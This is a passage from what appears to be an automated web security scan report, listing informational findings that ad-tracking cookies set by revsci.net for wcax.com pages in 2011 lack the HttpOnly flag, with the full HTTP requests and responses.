6.129. http://pix04.revsci.net/E05511/b3/0/3/0902121/135299998.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/135299998.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/135299998.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%2526affname%253DWCAX%2526adtag%253DPolitical%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18197%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDO6ET85se19nKCDeVRxV0pPvV/yUINBw3cQgYrocUZKyvzimWlj6utDM74WWx+zsRJJJHGffRnwGsNwXYNjevvtmFNS7oQ5OZmu22s+sITDi+rxYBR66D93WQXHgEf1oWZ1SDZ6kTZ3GQaGGwkpV/CuUsd6gGix0UAfqMlQMdGF8nTLK8Ncf8eOf1nn2QS6mQQLdlm9O2IxMsB5E2JAIeUSFVgimJPlVDu0b2JW9OM67FdTf5D5TesErOTr+cGfqpgbqb+TDPH82p030TSKqCMc3fiTs=; rtc_kyUL=MLsv8VUucT5jZiikOEcU9ETXogUC0zg5ozNC5TZsQpoZ1XM0c3poC/S8o6gL3dmLNudZyUEHBSAy9DbqYRishsAluZLfFyPHoW8OnSeutlPGT/9/yatZEYhKP0fsjK91LGefXs0IFtIUglN4VvEbdB94gnJik9VR3JwBRtB0k+C4P5UtnEKeKpV1g0Rv83740nXMV7YE/uPDtQFbm0Q8eV1Zd0GXuQK0nT7WirXZJe/V8mV9ZUoEyHl5odcfSkb+K6JNo78s6B8lVwS+1OK8yjE3ld42puQDa4oRtNPsj+tg+8uNeC31TvLQNYMxtN08pZU9Wwz7+Y02P0GKlzuW58YZ2ax+coZLrUgBLDwxwmi/FcTAEueywLNduv7UFNzWsaqmVoy0obcSI0s1HsFhhRgiluSuLojCnYPs3wnFuu3sguAbpZ24bo2l84IPd51AxF5VgN5/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_kyUL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRNpW80lkUA+HR+nmR+zdL28cRLrw7OdqtvRQX7M6YvuD6G01f/BuKwL9GIcLk0FNznVXs1FOCnfg0VUZcvsQPTvmT/tqUJ5VUxzqzSb3Ao/eR1mU8id0bEE9wVyvXGviU4q2/8L7DKCUk26DEzJUarfj63iV8FJAzyuE5Zi5pVRUzke4isIv2Xs62p6o7L3i1SSGQfWcZZhRmSobq5ogFEHk0Q9IuNFPfqunL81NYW0J0cMF4iQTe6bDEQVWVkD//iJ0Os4aXvfsKebL8t1DQ7WD9p2JVOIsmRryZFO9xw==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:36:04 GMT; Path=/
Set-Cookie: rtc_jIvV=MLsv7iUucA5nphC0fK8UWVoPI7fHKbGZaCQWuLR8p51z2DQ30G6uId0c9nDR2NMmzuXDJn0g0ESydFY6J95tmRiMY4yJ+sPdsYG8naLdrtr9SkW1eU9LpSjwtwgkQP0c7xx5jIRX7BMLqY4BgQCi3lhOAqvHai05Eb4PMDzu8yVD7ZZtiMBMCGycqLqWQYCGq6/md6/qYfaCA/ASs+y+9h5Xku/5nx7gfwirUhl4NHT2YUt+eLF1KH0Dtob5tEs06Q4obofo5w6/Tq+72ff/TaSCEZMZN8I5s1OOFuAASezBAhhSmCgFlyoZVVoDwXYDXkzHvff3+yl07BzRzA1eRi19Z+xwYoBSMP57irOrEQXluDeg+WH4CuHVXdpJP4HgrkGvCJrCPigIHu5GI7hwiNibi41/41/tnH36B3S/V+jJFysVDPJjnlu9tMtcj3eUM1FGM6b+OUkIZ7c78jeLogk07LTWGnScH2nMsO4=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:36:04 GMT; Path=/
X-Proc-ms: 53
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:36:04 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424','D08734_72076'
...[SNIP]...
6.130. http://pix04.revsci.net/E05511/b3/0/3/0902121/209148801.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/209148801.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/209148801.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252F%253Faffname%253DWCAX%2526adtag%253DHomepage%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_p8aZ=MLsv7iUucA5nphC0/O7vtsjGNyz6AmULA1P4XndTcpIZ23d9qktkSoTcKGKIRpg710XdXThxtQ6zdFY6J95tmRiMY4yJ+sMdgAuenaLFrtrdRk1XWU9LpyjwtxgsQP0c7xxljHTX7BOLqY4xgQCs3lhGEqvHai05ED4MMDju8yVD7ZZtiMBMCGycqLqWcYC2y8NbVOx8Y1eQZ3yd0bUUw+UBsL8TnR7gPwiq0hl4MvT2YUt6oujwzI7qERgLlBVVr1Ckd5Szw9oGgYCZ3DWnFjsmwgyfZdo6malf61CzbVPZNP15BmGAfLkBkmJdnLDpC2OaS6bXfWondtA/5nZitsDt9iOXeX3L70GPHrFexa6SZ/0SCkkewx/BSDc2GjZn8H9slov9a6d6zjKI3U9d8/YecvDA6McTYIpxuqIYyG+L+BSmfQJVRVXrhI3ic9YEBCUo/esYIrRRnmxZiwg9IE39UhB58WPk2TkadyOOYhgupW0=; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDK8mbNy+QUBv0AIKNDUBSSiAqkracs3b0+sttkvcnG4FQF1YFME4zlfRD4gH9GEcK40FJyvVXvFWOSkvA0VXok/sQMTNpRvi17bSmHua6WA9WZtqLPeFcWOkre2FiGJnoSz9spn1x1tGgUNOfU7j20zgR7+ThGnVwVYDeaLVmTjOAUcAAbpL/2wV2KW0WEMJlthu2SC0hsPpVWCjWxzUAwOKnkQmJ+C1gUkcexW8OWRZuKqJA3BP4B2KFS4dIikJ0HMm+/Ai9VYl0K4SKpokfWj/I0spyfsCvw1vE4N5zpnPo

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_p8aZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRNpW80lkUA+HR+nmR+zdL28cRLrw7OdqtvRQX7M6YvuD6G01f17sIBz9GIcLk0FNznVXs1FOCnfg0VUZcvsQPTvmT/tqUJ5VUxzqzSb3Ao/eR1mU8id0bEE9wdz+aE+DTHEP/FwOA6hHcFAHeB6C25CRmkJMYHKSisXqcpUuocBcTo0su1h/6CHNtg5OtkGhlZcP2x6+09N/f+AEfH42qZHZs5sDNBh2nFUfaV2yJxAzXGps0rS6iDAne0d0f+fzWqEtjies8qbfGL8lOUhc29NFsk03JhxFGKv/9hI=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:50 GMT; Path=/
Set-Cookie: rtc_NU-e=MLsv8VUusQ9nplAbh+n6LFsXooeD0nh55ayhItw9Rx7JWLQrtG7pfYySB2GA3Nkt/3vE4EHvXHSrcNbcIO4b8B1jIlcCH5IHgInSD6DlrtrNRklXWU9LpinwxzgwQP187xxpkNoVxqc5g0Ksi0fqu3Z4OZ9TCWukp+fzOTqRG+FbCpZ1lNWeSoRp4pvl4W6xqmQFwWU4O5lq/w84KnkvAlUkVNwOL7pOF2KVroDjGpx3LQL4w25Sc5a38gWgeVY5oBcsSi4lWRF8zflEvKnkkcWc7L2wiv9axAbc68YjzxC5/fI6qGaK7mrUiBp+5iAS38/Ln32j+SV/ehLBUSTYc5NoQpVx9D9jia6uekGvE+AnaQEGnf1161LH/ZBBrd1FkNrqH87szYKBCWcJz1+P0q9PArWGYEMwtIYB5HVWRY34FsNH9AzwMFIeiW+ySqObcbfFPPZWpQi/Pk976Tx24gqtUfcN9vTjpF5mgS/YLbhW; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:50 GMT; Path=/
X-Proc-ms: 28
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:39:50 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
6.131. http://pix04.revsci.net/E05511/b3/0/3/0902121/21225103.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/21225103.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/21225103.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D465801%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=465801
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_OT2-=MLsv7iUucA5nprADoxMUZ9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBOpPrdSk21eU9Lpyn2txgsRP0c/xxljHTX7BOLqY4BgQCs3lhGEmvvtSk5ED4MMDjv8yVDLYK7pDAruXeuMbqWcYC2y8NbEmpQplW1r3QCDBMDKlKs8h8jhookQYAMg5VB8aLCKuUNV2xyc1W3wSgWiH53GskBj+0uPvbr8fL/03M+lmnwVEf4DsM5sw+zuqC6OKjBGhCiv0nZQy4ZVVoDwYqo6mnNRAo7OEEkJiv+bHNiyxW/clLxVJZkkeyyUV8ztAVi+A9zG0+EPcegfMGdz9/Dr32PiBkC/DCFzbz6JSYOyqhoYdpYn7eMNpSOdKL11qZrM6hDRzvlbWawXokjviVqpJEJmq4AbNHzRSYEvAqk8V1vS7MIKaCr4liagD/po7gg; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDK8mbN8dWU3gUYHSBgXF1Q2iK6QWdXO/91pNj2vFsFMbIW8UM7jRJXKFhp2TB0DM1qpPAHSY/5YU7ZStywpgUhqyJ5BInsNmgp1DvN3WPq7dgChZHMtDM/6x5OOiwoKfjgb0+ILnB0Su4g60wrJgUSjeLyFzDdvg9CRNBoPbOkdhQQ53dpWeEYa9TojOeowPB3LH+kNv0cpWE/pMJP094mgdkA6LvyBdQT0gKk8gxZkHUwdeGYigkpfkHSebdMR3LQqTjefT04q58F7jR7Q7rknDYEs9O1VaycX5p8CbtzlC92A==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_OT2-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRNpWU3hmUA+HR+nmRzzOL28cRLrw7OdqtvRQX7M6YvuD6G01f/A+phz9GIcLk0FNfgXkx4D8v6War7+H+n9IY3rvMelQqlIvMHasq7diCRdHMsDP/Sq+8D4Q1wCE/3FsgyRke9cSEdLczcS8eR2CQRzAVoqeD6154KJDFZJWT8qJ5EKHnue0KBI0YmtgiHu4Ntq2Y0wgrFty41pfM0ejR+mO3cOXMhusMy2FrwjYCkBZRpiYbz20ntgVfPpIpnAOytuuxBL7P0KNrL/F6WV5eyzDyCaCp66M49iLenPs; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:59 GMT; Path=/
Set-Cookie: rtc_LJFw=MLsv8SUucA5nprADwxMUT9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFepPr9SkW1eU9LpSn2xzgwRP18/xx5kJplxqdZg0K0i0fqu/J/OZ9TCWtEp+fzuXuRG+FbCpZ1lOmeCoTp4pvl426xqmAFAWY4P51r/3fAwOzCWO5FcV4p1IrmF2CVroSvndkRCrxSEgB3YRuQwSAQiH132nljo3cuPvcqTkJH7pqq+HZ+yu4LbbP1Wws8UaQ//AvRqu0LQKkkR7aSBTL/fY/adAXHS4sVvNFsz2sFWsy5E+9lTHca29T2ckra1UWkj/ZVjlkwAfbv1rIjcWXvGBjkFTLYIeSAmiAAOsEhNg/HOoGcoZuIH37rGNoaFz8F4rx7j8fqSWaE+E5rI3yMJpNn0B20F8yoQz7E4kPhGO4G5iCUfwVoCLJLxkKPdlyOZqGapSs=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:59 GMT; Path=/
X-Proc-ms: 20
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:39:59 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
6.132. http://pix04.revsci.net/E05511/b3/0/3/0902121/281102501.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/281102501.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

